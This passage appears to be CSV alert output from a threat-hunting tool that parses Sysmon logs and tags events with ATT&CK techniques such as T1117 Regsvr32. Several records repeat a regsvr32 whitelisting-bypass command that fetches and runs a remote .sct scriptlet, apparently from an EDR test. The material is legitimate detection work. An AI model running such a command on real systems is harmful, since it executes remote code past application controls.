+Prohibited Process connecting to internet,1564436029.340889,2019-07-30T01:33:49.340889+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname (  ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:46.095763Z"">
+    </TimeCreated>
+    <EventRecordID>4934</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Suspicious NetCon</Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:44.949</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
+    <Data Name=""ProcessId"">4288</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
+    <Data Name=""SourcePort"">49829</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">151.101.0.133</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">443</Data>
+    <Data Name=""DestinationPortName"">https</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1564436026.095763,2019-07-30T01:33:46.095763+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( &quot;C:\Windows\System32\calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:45.581170Z"">
+    </TimeCreated>
+    <EventRecordID>4933</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:45.332</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6639-5D3F-0000-001074F48900</Data>
+    <Data Name=""ProcessId"">208</Data>
+    <Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Calculator</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\calc.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
+    <Data Name=""ParentProcessId"">4288</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""ParentCommandLine"">regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:44.641177Z"">
+    </TimeCreated>
+    <EventRecordID>4931</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:44.622</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
+    <Data Name=""ProcessId"">4288</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:44.641177Z"">
+    </TimeCreated>
+    <EventRecordID>4931</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:44.622</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
+    <Data Name=""ProcessId"">4288</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:44.641177Z"">
+    </TimeCreated>
+    <EventRecordID>4931</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:44.622</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
+    <Data Name=""ProcessId"">4288</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1557854258.250959,2019-05-14T21:17:38.250959+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-14T17:17:26.738627Z"">
+    </TimeCreated>
+    <EventRecordID>32009</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1580"" ThreadID=""3960"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>alice.insecurebank.local</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-14 17:17:24.660</Data>
+    <Data Name=""ProcessGuid"">ECAD0485-F2EC-5CDA-0000-0010F1631500</Data>
+    <Data Name=""ProcessId"">4092</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""User"">insecurebank\Administrator</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.59.4.20</Data>
+    <Data Name=""SourceHostname"">alice.insecurebank.local</Data>
+    <Data Name=""SourcePort"">49584</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">10.59.4.11</Data>
+    <Data Name=""DestinationHostname"">DC1</Data>
+    <Data Name=""DestinationPort"">389</Data>
+    <Data Name=""DestinationPortName"">ldap</Data>
+  </EventData>
+</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1557854246.738627,2019-05-14T21:17:26.738627+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-14T17:17:26.440651Z"">
+    </TimeCreated>
+    <EventRecordID>32008</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1580"" ThreadID=""3960"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>alice.insecurebank.local</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-14 17:17:24.597</Data>
+    <Data Name=""ProcessGuid"">ECAD0485-F2EC-5CDA-0000-0010F1631500</Data>
+    <Data Name=""ProcessId"">4092</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""User"">insecurebank\Administrator</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.59.4.20</Data>
+    <Data Name=""SourceHostname"">alice.insecurebank.local</Data>
+    <Data Name=""SourcePort"">49583</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">10.59.4.11</Data>
+    <Data Name=""DestinationHostname"">DC1</Data>
+    <Data Name=""DestinationPort"">389</Data>
+    <Data Name=""DestinationPortName"">ldap</Data>
+  </EventData>
+</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:44.268287Z"">
+    </TimeCreated>
+    <EventRecordID>4929</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:44.204</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
+    <Data Name=""ProcessId"">1652</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:44.268287Z"">
+    </TimeCreated>
+    <EventRecordID>4929</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:44.204</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
+    <Data Name=""ProcessId"">1652</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1587853142.072006,2020-04-26T02:19:02.072006+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-04-25T22:19:02.057201Z"">
+    </TimeCreated>
+    <EventRecordID>27334</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2752"" ThreadID=""3576"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-04-25 22:19:01.724</Data>
+    <Data Name=""ProcessGuid"">747F3D96-B755-5EA4-0000-0010D06E2500</Data>
+    <Data Name=""ProcessId"">4484</Data>
+    <Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Host Process for Windows Services</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">svchost.exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-3384-5EA5-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
+    <Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""ParentProcessId"">596</Data>
+    <Data Name=""ParentImage"">?</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028513.459611,2019-03-20T00:48:33.459611+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:48:33.439582Z"">
+    </TimeCreated>
+    <EventRecordID>1966368</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
